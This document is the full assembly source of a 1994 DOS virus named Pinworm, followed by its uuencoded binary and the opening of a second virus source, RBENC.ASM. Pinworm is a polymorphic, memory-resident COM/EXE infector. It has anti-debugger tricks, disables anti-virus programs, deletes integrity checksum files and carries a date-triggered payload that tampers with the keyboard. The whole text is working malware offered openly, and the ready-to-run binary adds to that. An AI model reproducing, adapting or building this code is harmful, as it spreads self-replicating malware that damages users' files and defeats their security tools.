SECOND_CRYPT equ 1 ; use second cryptor? XTRA_SPACE equ 1 ; xtra space to prevent double cryptor? INCLUDE_INT3 equ 1 ; include INT 3 in garbage code? ; (slows the loop down alot) KILL_AV equ 1 ; Kill AVs as executed? KILL_CHKLIST equ 1 ; Kill MSAV/CPAV checksum filez? ; thingz to change.. kill_date equ 19 ; day of the month to play with user max_exe equ 4 ; max exe file size -high byte msg_filez equ 17 ; number of filenames for our msg ; polymorphic engine options.. inc_buf_size equ 20 ; INC buf enc_op_bsize equ 36 ; ENC buf ptr_buf_size equ 36 ; PTR buf cnt_buf_size equ 36 ; CNT&OP dj_buf_size equ 36 ; DEC&JMP loop_disp_size equ 20 ; loop buf range ;compile and change the below equate to the second byte of the JNZ operand org_loop equ 8Dh ; original JNZ offset signal equ 0FA01h ; AX=signal/INT 21h/installation chk vsafe_word equ 5945h ; magic word for VSAFE/VWATCH API enc_size equ offset first_crypt-offset encrypt enc2_size equ offset code_start-offset first_crypt real_start equ offset dj_buf+3 ; starting location of encryted code org 0h ; hellacious EXE offset calcs if !0 start: ;ÄÄÄÄ Encryptor/Decryptor Location ; Each opcode has predefined ranges to move within - once the opcode is ; determined, it is placed at the decided location within the buffer. ; 0 bytes constant ; encrypt: ptr_buf db ptr_buf_size-3 dup (90h) db 0BEh dw real_start+100h encryptor: cnt_buf db cnt_buf_size-3 dup(90h) db 0B8h ; AX:b8 dw offset vend-offset dj_buf enc_loop: loop_disp db loop_disp_size dup(90h) inc_buf db inc_buf_size dup(90h) enc_op_buf db enc_op_bsize dup(90h) misc_buf dw 9090h word_inc db 90h dj_buf db dj_buf_size-3 dup (90h) dec ax jnz enc_loop ; for orig. only ret_byte db 090h ; C3h or a NOP equiv. first_crypt: ; end of first cryptor ;ÄÄÄÄ Second encryptor ; Whose only purpose is to tear the shit out of debuggers. It obviously ; isn't invincible, but will at least keep the lamerz and ignorant morons ; like Patti Hoffman out of the code. 
; ; þ Uses reverse direction word XOR encryption ; þ Uses the following techniques: ; ð JMP into middle of operand ; ð Replace word after CALL to kill stepping over call ; ð Kills INT 1 vector ; ð Disables Keyboard via Port 21h ; ð Reverse direction encryption prevents stepping past loop ; ð Uses SP as a crucial data register in some locations - if ; the debugger uses the program's stack, then it may very well ; phuck thingz up nicely. ; ð Uses Soft-Ice INT 3 API to lock it up if in memory. ; sti ; fix CLI in garbage code db 0BDh ; MOV BP,XXXX bp_calc dw 0100h push ds es ; save segment registers for EXE IF SECOND_CRYPT push ds dbg1: jmp mov_si ; 1 db 0BEh ; MOV SI,XXXX mov_si: db 0BEh ; MOV SI,XXXX rel2_off dw offset heap+1000h ; org copy: ptr way out there call shit add_bp: int 19h ; fuck 'em if they skipped jmp in_op ; 1 db 0BAh ; MOV DX,XXXX in_op: in al,21h push ax or al,02 jmp kill_keyb ; 1 db 0C6h kill_keyb: out 21h,al ; keyboard=off call shit6 past_shit: jmp dbl_crypt shit7: xor ax,ax ;null es mov es,ax mov bx,word ptr es: [06] ;get INT 1 ret shit: mov word ptr cs: add_bp[bp],0F503h ;ADD SI,BP mov word ptr cs: dec_si[bp],05C17h ;reset our shit sister ret shit2: mov word ptr cs: dec_si[bp],4E4Eh mov word ptr cs: add_bp[bp],19CDh ;reset our shit brother call shit3 jnc code_start ;did they skip shit3? xor dx,cx ret db 0EAh ;JMP FAR X:X shit4: db 0BAh ;MOV DX,XXXX sec_enc dw 0 mov di,4A4Dh ;prepare for Soft-ice ret shit3: mov ax,911h ;soft-ice - execute command call shit4 stc dec word ptr es: [06] ;2-kill INT 1 vector push si mov si,4647h ;soft-ice int 3 ;call SI execute - DS:DX-garbage pop si ret shit6: mov byte ptr cs: past_shit[bp],0EBh out 21h,al ; try turning keyboard off again ret dbl_crypt: ; main portion of cryptor mov cx,(offset heap-offset ret2_byte)/2+1 call shit7 dbl_loop: jmp $+3 ; 1 db 034h ; XOR ... 
call shit3 ; nested is the set DX xchg sp,dx ; xchg SP and DX jmp xor_op ; 1 db 0EAh ; JMP FAR X:X xor_op: xor word ptr cs: [si],sp ; the real XOR baby.. xchg sp,dx ; restore SP call shit2 dec_si: pop ss ; fuck 'em if they skipped shit2 pop sp int 3 xchg sp,bx ; SP=word of old int 1 vec dec cx mov es: [06],sp ; restore int 1 vector xchg sp,bx ; restore SP jnz dbl_loop ret2_byte db 90h,90h ;ÄÄÄÄ Start of another artificial lifeform ENDIF code_start: IF SECOND_CRYPT pop ax es ; Get port reg bits (ES=PSP) out 21h,al ; restore keyboard ENDIF mov cs: activate[bp],0 ; reset activation toggle mov cs: mem_word[bp],0 ; reset mem. encryption inc si ; SI!=0 mov dx,vsafe_word ; remove VSAFE/VWATCH from memory mov ax,0FA01h ; & check for residency of virus too int 21h or si,si ; if SI=0 then it's us jz no_install mov ah,2ah ; get date int 21h cmp dl,kill_date ; is it time to activate? jnz not_time mov cs: activate[bp],1 not_time: mov ax,es ; PSP segment - popped from DS dec ax ; mcb below PSP m0n mov ds,ax ; DS=MCB seg cmp byte ptr ds: [0],'Z' ; Is this the last MCB in chain? jnz no_install sub word ptr ds: [3],(((vend-start+1023)*2)/1024)*64 ; alloc MCB sub word ptr ds: [12h],(((vend-start+1023)*2)/1024)*64 ; alloc PSP mov es,word ptr ds: [12h] ; get high mem seg push cs pop ds mov si,bp mov cx,(offset vend - offset start)/2+1 xor di,di rep movsw ; copy code to new seg xor ax,ax mov ds,ax ; null ds push ds lds ax,ds: [21h*4] ; get 21h vector mov es: word ptr old21+2,ds ; save S:O mov es: word ptr old21,ax pop ds mov ds: [21h*4+2],es ; new int 21h seg mov ds: [21h*4],offset new21 ; new offset call get_random cmp dl,5 jle no_install sub byte ptr ds: [413h],((offset vend-offset start+1023)*2)/1024 ;-totalmem no_install: xor si,si ; null regs.. xor di,di ; some progs actually care.. 
xor ax,ax xor bx,bx xor dx,dx pop es ds ; restore ES DS cmp cs: exe_phile[bp],1 jz exe_return lea si,org_bytes[bp] ; com return mov di,0100h ; -restore first 4 bytes movsw movsw mov ax,100h ; jump back to 100h push ax _ret: ret exe_return: mov cx,ds ; calc. real CS add cx,10h add word ptr cs: [exe_jump+2+bp],cx int 3 ; fix prefetch cli mov sp,cs: oldsp[bp] ; restore old SP.. sti db 0eah exe_jump dd 0 oldsp dw 0 exe_phile db 0 ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Infection routine - called from INT 21h handler. ; DS:DX=fname ; Assumes EXE if first byte is 'M' or 'Z' ; Changes/Restores attribute and time/date ; ; If philename ends in 'AV', 'AN', or 'OT' it's not infected and has it's ; minimum req. memory in the header (0Ah) changed to FFFFh, thus making it ; unusable. ; infect_file: mov di,dx ; move filename ptr into an index reg push ds ; search for end of filename(NULL) pop es xor ax,ax mov cx,128 repnz scasb cmp word ptr [di-3],'EX' ;.eXE? jz is_exec chk_com: cmp word ptr [di-3],'MO' ;.cOM? jnz _ret is_exec: IF KILL_AV mov cs: isav,0 cmp word ptr [di-7],'VA' ;*AV.*? CPAV,MSAV,TBAV,TNTAV jz anti_action cmp word ptr [di-7],'TO' ;*OT.*? F-PROT jz anti_action cmp word ptr [di-7],'NA' ;*AN.*? jnz name_ok cmp word ptr [di-9],'CS' ;*SCAN.*? 
jnz name_ok anti_action: inc cs: isav ; set mark for anti-virus kill name_ok: ENDIF push ds ; save fname ptr segment mov es,ax ; NULL ES (ax already 0) lds ax,es: [24h*4] ; get INT 24h vector mov old_24_off,ax ; save it mov old_24_seg,ds mov es: [24h*4+2],cs ; install our handler mov es: [24h*4],offset new_24 pop ds ; restore fname ptr segment push es push cs ; push ES for restoring INT24h later pop es ; ES=CS mov ax,4300h ; get phile attribute int 21h mov ax,4301h ; null attribs 4301h push ax cx ds dx ; save AX-call/CX-attrib/DX:DS xor cx,cx ; zero all int 21h mov bx,signal mov ax,3d02h ; open the file int 21h jc close ; if error..quit infection xchg bx,ax ; get handle push cs ; DS=CS pop ds IF KILL_CHKLIST call kill_chklst ; kill CHKLIST.MS & .CPS filez ENDIF mov ax,5700h ; get file time/date int 21h push cx dx ; save 'em for later mov ah,3fh ; Read first bytes of file mov cx,18h ; EXE header or just first bytes of COM lea dx,org_bytes ; buffer used for both int 21h call offset_end ; set ptr to end- DXAX=file_size cmp byte ptr org_bytes,'M' ; EXE? jz do_exe cmp byte ptr org_bytes,'Z' ; EXE? jz do_exe cmp byte ptr org_bytes+3,0 ; CoM infected? jz d_time dec exe_phile push ax ; save file size add ax,100h ; PSP in com mov rel_off,ax ; save it for decryptor mov bp_calc,ax call encrypt_code ; copy and encrypt code lea dx,vend ; start of newly created code mov cx,offset heap+0FFh ; virus length+xtra add cl,size_disp ; add random ^in case cl exceeds FF mov ah,40h int 21h ; append virus to infected file call offset_zero ; position ptr to beginning of file pop ax ; restore COM file size sub ax,3 ; calculate jmp offset mov word ptr new_jmp+1,ax ; save it.. 
lea dx,new_jmp ; write the new jmp (E9XXXX,0) mov cx,4 ; total of 4 bytes mov ah,40h int 21h d_time: pop dx cx ; pop date/time mov ax,5701h ; restore the mother fuckers int 21h close: mov ah,3eh ; close phile int 21h pop dx ds cx ax ; restore attrib int 21h dont_do: pop es ; ES=0 lds ax,dword ptr old_24_off ; restore shitty DOS error handler mov es: [24h*4],ax mov es: [24h*4+2],ds ret ; return back to INT 21h handler do_exe: cmp dx,max_exe jg d_time mov exe_phile,1 IF KILL_AV cmp isav,1 ; anti-virus software? jnz not_av mov word ptr exe_header[0ah],0FFFFh ; change min. mem to FFFFh jmp write_hdr not_av: ENDIF cmp word ptr exe_header[12h],0 ; checksum 0? jnz d_time mov cx,mem_word ; get random word inc cx ; make sure !0 mov word ptr exe_header[12h],cx ; set checksum to!0 mov cx,word ptr exe_header[10h] ; get old SP mov oldsp,cx ; save it.. mov word ptr exe_header[10h],0 ; write new SP of 0 les cx,dword ptr exe_header[14h] ; Save old entry point mov word ptr exe_jump, cx ; off mov word ptr exe_jump[2], es ; seg push cs ; ES=CS pop es push dx ax ; save file size DX:AX cmp byte ptr exe_header[18h],52h ; PKLITE'd? (v1.13+) jz pklited cmp byte ptr exe_header[18h],40h ; 40+ = new format EXE jge d_time pklited: mov bp, word ptr exe_header+8h ; calc. 
new entry point mov cl,4 ; *10h shl bp,cl ; ^by shifting one byte sub ax,bp ; get actual file size-header sbb dx,0 mov cx,10h ; divide me baby div cx mov word ptr exe_header+14h,dx ; save new entry point mov word ptr exe_header+16h,ax mov rel_off,dx ; save it for encryptor mov bp_calc,dx call encrypt_code ; encrypt & copy the code mov cx,offset heap+0FFh ; virus size+xtra add cl,size_disp ; add random ^in case cl exceeds FFh lea dx,vend ; new copy in heap mov ah,40h ; write the damn thing int 21h pop ax dx ; AX:DX file size mov cx,(offset heap-offset start)+0FFh ; if xceeds ff below add cl,size_disp adc ax,cx mov cl,9 ; calc new alloc (512) push ax shr ax,cl ror dx,cl stc adc dx,ax pop ax and ah,1 mov word ptr exe_header+4h,dx ; save new mem. alloc info mov word ptr exe_header+2h,ax write_hdr: call offset_zero ; position ptr to beginning mov cx,18h ; write fiXed header lea dx,exe_header mov ah,40h int 21h jmp d_time ; restore shit/return ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Kill CHKLIST.* filez by nulling attribs, then deleting ; phile. ; kill_chklst: mov di,2 ; counter for loop lea dx,chkl1 ; first fname to kill kill_loop: mov ax,4301h ; reset attribs xor cx,cx int 21h mov ah,41h ; delete phile int 21h lea dx,chkl2 ; second fname to kill dec di jnz kill_loop ret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; set file ptr offset_zero: ; self explanitory xor al,al jmp set_fp offset_end: mov al,02h set_fp: mov ah,42h xor cx,cx xor dx,dx int 21h ret ;-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-- ; Morph, copy, & crypt ; ; 0 bytes constant ; 0 operands in constant locations ; ; ms: ; bit 7 ; 6 ; 5 ; 4 - INCREMENT COUNTER OP ; 3 - ; 2 - INCREMENT ENCRYPTOR OP ; 1 - ADD&SUB|XOR ; 0 - WORD|BYTE ; IF<20-SELECTION BETWEEN JNZ AND JNS ; IF<5-DON'T WRITE ENCRYPTION OPS! 
; sec: ; IF<=5-use constant NOP instead of random ; encrypt_code: push bx ; save the handle ;ÄÄÄÄ Fill buffer space with garbage bytes lea di,encrypt ; fill buffer /w it mov bp,enc_size+1 call fill_buffer ;ÄÄÄÄ Randomly select between jmp type : JNZ or JNS call get_random mov enc_num,dl ; store ms count for encryption mov mem_word,dx ; mem cryption too mov size_disp,dl ; and size displacment cmp dl,20h jl jmp_2 mov byte ptr jnz_op,75h ; use jnz jmp jmp_set jmp_2: mov byte ptr jnz_op,79h ; jns jmp_set: ;ÄÄÄÄ Change jump address cmp byte ptr jnz_op+1,org_loop+loop_disp_size ; JNX on max offset? jnz inc_jmp_ofs ; if not then inc the ptr mov byte ptr jnz_op+1,org_loop ; jump to pos X in buffer inc_jmp_ofs: inc byte ptr jnz_op+1 ; increment jmp into buffer ;ÄÄÄÄ Change encryption type randomly between XOR and ADD&SUB mov al,04 ; default to encrypting ADD mov enc_type,2Ch ; and decrypting SUB test dl,00000010b ; that bit =1? jz use_add_sub mov al,34h ; encrypting XOR mov enc_type,34h ; decrypting XOR use_add_sub: ;ÄÄÄ Change register used for the counter cmp byte ptr count_op,0BBh ; skip SP/BP/DI/SI jnz get_reg mov byte ptr count_op,0B7h ; AX-1 mov byte ptr dec_op,47h ; AX-1 get_reg: inc byte ptr count_op ; increment to next OP inc byte ptr dec_op ; "" ;ÄÄÄÄ Change position of INC XX mov di,inc_ptr ; get new off for INC XX cmp di,inc_buf_size ; max position? jl good_inc ; if not..then continue mov inc_ptr,0 ; use offset 1 next run xor di,di ; use offset 0 this run good_inc: inc inc_ptr ; increment the ptr for next ;ÄÄÄÄ Toggle between SI and DI cmp byte ptr ptr_set,0BEh ; using SI? 
jz chg_di ; if so, then switch to DI mov byte ptr inc_buf[di],46h ; write INC SI dec byte ptr ptr_set ; decrement to SI jmp done_chg_ptr chg_di: mov byte ptr inc_buf[di],47h ; write INC DI inc byte ptr ptr_set ; increment to DI inc byte ptr enc_type ; increment decryptor inc ax ; increment encryptor done_chg_ptr: ;ÄÄÄÄ Select word or byte encryption mov w_b,80h ; default to byte cryption test dl,00000001b ; use word? jz use_byte mov w_b,81h ; now using word en/decryptor mov ch,byte ptr inc_buf[di] ; get INC op mov byte ptr word_inc,ch ; write another one use_byte: ;ÄÄÄÄ Increment counter value cmp byte ptr crypt_bytes,0Fh ; byte count quite large? jnz inc_cnt ; if not..increment away mov crypt_bytes,offset vend ; else..reset byte count inc_cnt: inc crypt_bytes ; increment byte count ;ÄÄÄÄ Set DEC XX /JNS|JNZ operands mov di,dec_op_ptr cmp di,dj_buf_size-2 jl good_dec_op mov dec_op_ptr,0 xor di,di good_dec_op: inc dec_op_ptr no_inc_dec_op: add di,offset dj_buf lea si,dec_op movsw movsb inc di ;word align add rel_off,di ;chg offset for decryption push di ;save offset after jmp ;ÄÄÄÄ Set MOV DI,XXXX|MOV SI,XXXX mov di,ptr_op_ptr cmp di,ptr_buf_size-3 jl good_ptr_op mov ptr_op_ptr,0 xor di,di good_ptr_op: test dl,00001000b jz no_inc_ptr_op inc ptr_op_ptr no_inc_ptr_op: add di,offset ptr_buf lea si,ptr_set movsw movsb ;ÄÄÄÄ Set MOV AX|BX|DX|CX,XXXX mov di,count_op_ptr cmp di,cnt_buf_size-3 jl good_count_op mov count_op_ptr,0 xor di,di good_count_op: test dl,00010000b jz no_inc_count_op inc count_op_ptr no_inc_count_op: add di,offset cnt_buf lea si,count_op movsw movsb ;ÄÄÄÄ Set XOR|ADD&SUB WORD|BYTE CS:|DS:[SI|DI],XX|XXXX mov di,enc_op_ptr cmp di,enc_op_bsize-5 jl good_enc_ptr mov enc_op_ptr,0 xor di,di good_enc_ptr: test dl,00000100b jz no_inc_enc_ptr inc enc_op_ptr no_inc_enc_ptr: add di,offset enc_op_buf mov bx,di ; BX points to encrytor pos. lea si,seg_op movsw movsw ;ÄÄÄÄ FiX second cryptor offset IF SECOND_CRYPT mov rel2_off,offset heap ;first gen has mispl. 
off ENDIF ;ÄÄÄÄ Copy virus code along with decryptor to heap mov cx, (offset heap-offset start)/2+1 xor si,si lea di,vend ; ..to heap for encryption rep movsw ; make another copy of virus IF SECOND_CRYPT ;ÄÄÄÄ Call second encryptor first mov si,offset vend ; offset of enc. start.. add si,offset heap ; ..at end of code mov ret2_byte,0C3h xor bp,bp push ax bx call dbl_crypt pop bx ax mov ret2_byte,90h ENDIF ;ÄÄÄÄ Set ptr to heap for encryption pop si ; pop offset after jmp add si,offset vend ; offset we'z bez encrypting mov di,si ; we might be using DI too ;ÄÄÄÄ Encrypt the mother fucker mov ret_byte,0C3h ; put RET mov byte ptr [bx+2],al ; set encryption type call encryptor ; encrypt the bitch pop bx ; restore phile handle ret ; return ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Fill buffer with random garbage from table ; DI=off BP=size ; ret: BL=last garbage byte ; ; Decently random..relies on previously encrypted data and MS from clock ; to form pointer to the next operand to use.. ; ; fill_buffer: add bl,dl ; previous NOP+previous NOP off call get_random IF SECOND_CRYPT mov byte ptr sec_enc,cl ; use CL\DL for 2nd encryptor mov byte ptr sec_enc+1,dh ENDIF cmp dh,5 ; use random NOPs or constant NOP? jg use_rand xor dx,dx jmp constant use_rand: add dl,byte ptr vend+200h[di] ; encrypted byte somewhere.. 
sub dl,bl and dl,00001111b ; extract lower nibble xor dh,dh constant: mov si,dx ; build index ptr mov bl,byte ptr [nops+si] ; get NOP from table mov byte ptr [di],bl inc di ; increment buffer ptr dec bp jnz fill_buffer ; loop ret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; get time man - and use it as semi-random word ; get_random: mov ah,2ch ; get clock int 21h ret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Associated bullshit ; credits db ' þ PIïWérMÿv1.00 - Coded by ûirogen in April 1994' chkl1 db 'CHKLIST.MS',0 ; MSAV shitty checksum chkl2 db 'CHKLIST.CPS',0 ; CPAV shitty checksum pin_dir db 255,'PIïWérM.ûg!',0 ; DIR created root db '..',0 ; for changing to org. dir file1 db 'Iÿhopeÿy',0 ; filez created in dir.. db 'ouÿhaveÿ',0 ; must be 8 chars each+null db 'enjoyedÿ',0 ; (255 not space) db 'yourÿinf',0 db 'estation',0 db 'ÿbyÿtheÿ',0 db 'mighty P',0 db 'inworm p',0 db 'arasiteú',0 db 'úúúúúúúú',0 db 'Fuckÿyou',0 db 'all!ÿÿÿÿ',0 db '-ûirogen',0 ; #13 new_jmp db 0E9h,0,0,0 ; jmp XXXX ,0 (id) inc_ptr dw 0 ; ptr to location of INC enc_op_ptr dw 0 ; actual ENC op ptr ptr_op_ptr dw 0 ; ptr to ptr set pos count_op_ptr dw 0 ; ptr to counter reg pos dec_op_ptr dw 1 ; ptr to decrement counter op pos activate db 0 isav db 0 seg_op db 2Eh ; CS w_b db 80h ; byte=80h word=81h enc_type db 2Ch ; SUB BYTE PTR CS:[SI],XXXX ;XOR/34 enc_num db 0 ptr_set db 0BEh ; MOV SI,XXXX rel_off dw real_start+100h count_op db 0B8h ; CX:B9 AX:b8 crypt_bytes dw offset vend-offset dj_buf dec_op: dec ax ; DEC AX|BX|CX|DX jnz_op: db 75h,org_loop nops: nop ; 1 byte garbage OPs.. must be 16 IF INCLUDE_INT3 int 3 ELSE cld ENDIF into inc bp dec bp cld nop stc cmc clc stc into cli sti inc bp IF INCLUDE_INT3 int 3 ELSE nop ENDIF ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; activation routine ; act_routine: push ax bx cx ds dx bp es cs pop ds mov activate,0 ;we're in work now.. 
lea dx,pin_dir ;create our subdirectory mov ah,39h int 21h mov ah,3bh ;change to our new subdirectory int 21h lea dx,file1 ;offset of first filename mov bp,msg_filez ;# of filez total make_msg: xor cx,cx ;null attribs mov ah,3ch int 21h ;create phile jc dont_close xchg ax,bx mov ah,3eh ;close phile int 21h dont_close: add dx,9 ;point to next phile dec bp jnz make_msg lea dx,root ; change back to orginal dir mov ah,3bh int 21h cmp r_delay,5 ;5 calls? jl r_no ;if not then skip keyboard ror mov r_delay,-1 xor ax,ax ;es=null mov es,ax ror word ptr es: [416h],1 ;rotate keyboard flags r_no: inc r_delay ;increment calls count mov activate,1 pop es bp dx ds cx bx ax jmp no_act ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Interrupt 24h - critical error handler ; new_24: ; critical error handler mov al,3 ; prompts suck, return fail iret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; In-memory encryption function ; **virus encrypted in memory up to this point** ; mem_crypt: mov cx,offset mem_crypt-offset code_start xor di,di ;offset 0 mem_loop: db 2Eh,81h,35h ;CS:XOR WORD PTR [DI], mem_word dw 0 ;XXXX inc di loop mem_loop ret ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ; Interrupt 21h ; returns SI=0 and passes control to normal handler if ; VSAFE uninstall command is recieved. ; new21: pushf cmp cs: activate,1 ; time to activate? jnz no_act cmp ah,0Bh jl act_routine no_act: cmp ax,signal ; be it us? jnz not_us ; richtig.. cmp dx,vsafe_word jnz not_us xor si,si ; tis us mov di,4559h ; simulate VSAFE return not_us: cmp ah,4bh ; execute phile? 
jnz jmp_org go_now: push ax bp bx cx di dx ds es si call mem_crypt ; decrypt in memory call infect_file ; the mother of all calls call mem_crypt ; encrypt in memory pop si es ds dx di cx bx bp ax jmp_org: popf db 0eah ; jump far old21 dd 0 ; O:S exe_header: org_bytes db 0CDh,20h,0,0 ; original COM bytes | exe hdr ;ÄÄÄÄ Start of heap (not written to disk) heap: db 14h dup(0) ; remaining exe header space old_24_off dw 0 ; old int24h vector old_24_seg dw 0 r_delay db 0 size_disp db 0 ; additional size of virus IF XTRA_SPACE db 0DDh dup(0) ; xtra space for random write ; otherwise decryptor will be ; written twice - could make it ; vulnerable ENDIF vend: ; end of virus in memory.. cseg ends end start section 1 of uuencode 5.24 of file pinworm.com by R.E.M. begin 644 pinworm.com MZ0T``,T@@7W]6$5T!X%]_;^L`<[YD$7.^9!%SOF01<[YD$7.^9!%SOF01<[Y MD$7.^9!%SKG(!\[YD$7.^9!%SOF01<[Y1?Q%D/C.^L[,_$W,D)#.D$5%_)#U M1?S.1<[YD$7.^9!%SOF01<[Y1T7.^9!%SOF01<[YD$7.^9!%SODN@35#D$7. M^9!%SOF01<[YD$7.^9!%SOF01<[YD$7.^9!%SOF014?Y276.^9`&7KH`!EZZ M``9>N@`&7KH`!EZZ``9>N@`&7KH`!EZZ`/Z`0HY%CJB1_2XDEZN.0UU:>T(J MI[$3G$%[0E:EL:O<0WL0HX,>@[;(CD60@+Z$%H^00&5M5\7<0H%LC6@J^)XE)CW62& MI"[MKF,DHN#L<.*68J@XW2`:_=J&,-QQ!BJ3)K[G'A:7*&8R9PJJY23"/$ MO&!3B*ABJ&*H8E?I4GRO46C;*&):S"D?53KM%J_CU9_G+]VNAJ2N\JYB*1]1 M(_X6O>/5F^DX]65^R'=9X:N\JC!TV4D?-5E MCNZF\*A$;V0X8J9EMV2F91!BZZ^)VJDA^#.V,)NK94,38U+:JE]E0]H+.VRW MBIQC$&+_KXDS^M:7V[!B$@&OKXF*E&,H7,MEY1;)XI8!KSC<."AAI:X/KYU7BR9B*US=9:@7%^FF>Z\C(6S=92-LVV4A;+Q@;V3; M9:AB;&S?92%LN&`D9+I@IF7Z,BAX>#IRNX MJ-NX8E^3(73?90L;K^N^]*[KOMRHBLUB$02@8*;BK]CV:APB94/P.!$$H&"F MXJ]Q:=.A,GN*>ZA1<7@Z*(:IZ[X%K\'-94!'J-NP8A(!K];HKXF+@)T78*C8 M36<08^M18:^)UNFOB=A89^<71Z&:HD-@&&`<()NKF[!E0VLQ%V*HWQ5B0.2I MBAEC('0\9"%TL64@="AE*)B('J^DKOZN%T-G;F0T9-'BEO^NP]UG;F0U9"6< MKO^NTJRDKO&N3EZ@JA:OTIRDKO&N5BA<,&03%Z*DKOJNU6YD,V3OG*[ZKIRN M^:[IEN>NX5=VU&IO9"UDJ&*;G5=D+60H7#UD%A:CI"T^J"16;#UD0VQNY_1B M[YRN]ZZ@%/JCJAO2HXI;[KFW=9&]D,63V M:E=D,60C7"5D*YV*'J"EKN^N8JA15YVN[Z[C;_6HW#-D#<;O8Y;TKC4C7"%D 
M*YV)'J"EKNNN8JA15Y1J:MQF5V0A9"FEJ&(6]Z['#.F6Z:[A5T/4:F]D(V2H M8IN=7J"X%JR=KNFNXV]&J-PP9`W&(UPO9"N=MQZ@I:[EKF*H45>4:F;<9E=D M+V0II=AB([T6\Z['#:6NI:@%K]L<89N4%SR@D0W<]FHII,]E;F3S8VM113+[ MBF69\SIN9/-C.#PII/9J(YQN9!-B:^KO8$#'4CEK8'**@6(@;+EC(%2Z8RB< MK1VL47J)HV`]/*)(>^)*;9J4(Y`B_C9D('_O+]VQ:]:$KXFAB)R(,N&-_XO: M+U<4F4R84HA/B"''!LT&B`#10E,+V@W/!\9"P0R((]@0P0Z(4Y%;G"'@*>0K M^S:&+_MBZRKC+N$Q_$SK,OMB5S+AC?^+VB^&F<]#J$R&8N&=P`W8!U<;J`W= MG<`#W@=78LT,P@W1!\R=J!O'%]J=P0S.8LT1W`/<"\<,J)W*&U<6P`=78L4+ MSPK<&X@RJ`O&%<<0Q4+88LD0R1'!%LV8J)A2F%*84IA28NX7RPE7&\<7J`/$ M#HF=5YU78H69P1#'!.)M=FE&L4IGMKO@Q^7SZ-ZYLMZ2N[:YB$IZMUI&OB=:3KXG8I&05 M;ZA18=:4KXD0K?$<7&5#*Z"A+]V/$FNNUI.OB>*6':]GU&QN9-=E5U%H[&A$ M>6R^9E9DUV5N9"=DJ67U.+<[\SI#?1AA9]L<9YN=AN.=(9`E2IIK_H;BENVN M8]UG*)ZC'BE?J9C=:2F8[3O=9YN4%SOMXE0IW7GX-_LS_S"V9/Z*:YU`I%** M%9WV9;0Y!#D4.`0V^\;[S`0XE#D$/`X?-? MW@RP#=$.U6.P8[`%T1>A=;!CL$.00Y!#D$.;0[3FE]:14Q!#L$B0581#D$$5 M199CD#PZ0^_IET.00^_OD$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!# MD$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.0 M0Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!# MD$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.0 <0Y!#D$.00Y!#D$.00Y!#D$.00Y!#D$.00Y!#D)!# ` end sum -r/size 37641/3108 section (from "begin" to "end") sum -r/size 50854/2233 entire input file % RBENC.ASM % ~~~~~~~~~~~~~ Hey all a new virus for all to see. It's my second and it's lame but I think I have figured out encrypting :) ;Virus Name: RBENC (ratboy's encrypted virus) ;Writer: Ratboy ;type: com appender, encrypted, stealth, 3 infection per run, Lame :(, etc.. ;Accredits: All the guys and girls of NuKE. Couldn't have done it without Ya ; Some names worth mentioning, Firecracker, Mike Paris, Unforgiven, ; Analog Dog, etc.. and ofcourse (this pains me to say this, but ; I did learn somethings from him) Aristotle...eventhough you can ; be a real ass, maybe some day all virus writers could UNITE. ;Warning: This virus is for experimental purposes only! 
;this is to be used for educational purposes. I assume no responsibility,
;even though this virus contains no destructive coding.

code    segment
        org     100h                    ;starting point
        assume  cs:code,ds:code
main:
        nop                             ;initial fake beginning
        nop                             ;infected files will have a
        nop                             ;jump in this area
        db      'd'                     ;ID byte
startvx proc    near
        call    find_offset             ;get the offset. To determine
                                        ;the Delta Offset.
find_offset:
        pop     bp
        sub     bp,offset find_offset   ;calculate the delta offset
encryptval dw   0                       ;initial value for encryptval
        mov     byte ptr [bp + counter],4 ;my way of keeping count:)
        call    encryptdecrypt          ;let's unencrypt the virus
